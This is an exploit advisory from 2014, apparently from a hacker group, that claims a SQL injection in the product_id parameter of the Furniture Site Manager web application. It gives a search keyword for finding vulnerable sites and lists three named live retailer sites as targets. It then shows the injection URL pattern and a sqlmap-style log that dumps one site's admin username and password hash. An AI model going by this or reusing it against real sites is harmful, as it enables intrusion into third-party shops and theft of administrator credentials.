Furniture Site Manager => Remote (product_id) SQL Injection Vulnerability ~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ [+] Author : KnocKout [~] Contact : knockout@e-mail.com.tr (onlymail) [~] HomePage : http://h4x0resec.blogspot.com - http://cyber-warrior.org [~] GREETZ : DaiMon,BARCOD3_UnDeRTaKeR_ [Say]: Grmeyeli naslsnz beyler? xoron hala buralar takip ettiðine eminim. arada bir selam ver ge buralara zletme :) {trdan geri dndk biline...} {THE H4X0RE SECURITY PROJECT continues!! ] (Turkey] ~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~ |~Web App. : Furniture Site Manager |~Price : N/A |~Software: https://www.balcom-vetillo.com/furniture-site-manager/ - https://www.furnituresitemanager.com/ |~Vulnerability Style : SQL Injection |~Vulnerability Dir : / |~Keyword : "Powered By Furniture Site Manager" |[~]Date : "27.AG.2014" |[~]Tested on : (L):Kali Linux, Windows XP (R):Apache, PHP 5.4.31, MySQL 5 ~~~~~~~~~~~~~~~~[~]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Demos: http://finestfurniture.com/index.php?route=product/product&path=69&product_id=29880' AAAAAAAAAAAAAAA http://lakeknoxvillefurnitureco.com/index.php?route=product/product&product_id=36398' AAAAAAAAAAAAAAAA http://curlysfurniture.com/index.php?route=product/product&path=68&product_id=7171' AAAAAAAAAAAAAAAA ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ =============================================================== |{~~~~~~~~ Explotation| SQL Injection~~~~~~~~~~~}| http://$Site/$path/index.php?route=product/product&path=[true ID]&product_id=[true ID]' {SQL Injection} http://$Site/$path/index.php?route=product/product&product_id=[true ID]' {SQL INJECTON} Ex; http://curlysfurniture.com [~] SQL Injecting.. http://curlysfurniture.com/index.php?route=product/product&path=68&product_id=7171' //SQL Command the console ... [20:56:26] [INFO] fetching columns 'user_id=1, password, username' for table 'oc_user' in database 'curlysfurniture' [20:56:26] [INFO] the SQL query used returns 2 entries [20:56:26] [INFO] resumed: username [20:56:26] [INFO] resumed: varchar(20) [20:56:26] [INFO] resumed: password [20:56:26] [INFO] resumed: varchar(40) [20:56:26] [INFO] fetching entries of column(s) 'password, username' for table 'oc_user' in database 'curlysfurniture' [20:56:26] [INFO] the SQL query used returns 1 entries [20:56:26] [INFO] resumed: 749ec92d59aada28cd05de30b8e23aef92b8221c [20:56:26] [INFO] resumed: admin ... ... ... ============================================================= goodluck. greetz TURKEY